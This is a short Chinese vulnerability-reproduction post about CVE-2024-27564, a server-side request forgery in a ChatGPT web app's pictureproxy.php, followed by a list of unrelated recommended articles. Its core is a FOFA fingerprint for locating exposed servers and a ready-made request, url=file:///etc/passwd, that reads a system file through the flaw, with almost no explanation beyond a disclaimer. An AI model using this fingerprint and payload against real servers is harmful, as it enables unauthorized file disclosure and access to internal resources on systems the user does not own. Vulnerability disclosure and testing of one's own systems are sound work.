【漏洞复现】chatgpt pictureproxy.php SSRF漏洞(CVE-2024-27564)

0x01 漏洞概述

ChatGPT pictureproxy.php接口存在服务器端请求伪造 漏洞(SSRF) ,未授权的攻击者可以通过将构建的 URL 注入 url参数来强制应用程序发出任意请求。

0x02 测绘语句

复制代码
fofa: icon_hash="-1999760920"

0x03 漏洞复现

复制代码
GET /pictureproxy.php?url=file:///etc/passwd HTTP/1.1

0x04 影响范围

复制代码
chatgpt

0x05 免责声明

复制代码
本文所涉及的任何技术、信息或工具,仅供学习和参考之用。

请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。

作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。
相关推荐
程序喵大人14 分钟前
推荐个C++高性能内存分配器
开发语言·c++·内存分配
liu****17 分钟前
27.epoll(三)
服务器·开发语言·网络·tcp/ip·udp
福尔摩斯张19 分钟前
Axios源码深度解析:前端请求库设计精髓
c语言·开发语言·前端·数据结构·游戏·排序算法
zephyr0523 分钟前
深入浅出C++多态:从虚函数到动态绑定的完全指南
开发语言·c++
Chef_Chen28 分钟前
数据科学每日总结--Day25--区块链
开发语言·php
L-李俊漩30 分钟前
MMN-MnnLlmChat 启动顺序解析
开发语言·python·mnn
chjqxxxx35 分钟前
php使用ffmpeg实现视频随机截图并转成图片
ffmpeg·php·音视频
小镇学者38 分钟前
【PHP】PHP WebShell(网页木马)分析
android·开发语言·php
q***697744 分钟前
java进阶1——JVM
java·开发语言·jvm
沐知全栈开发1 小时前
PHP $_GET 变量详解
开发语言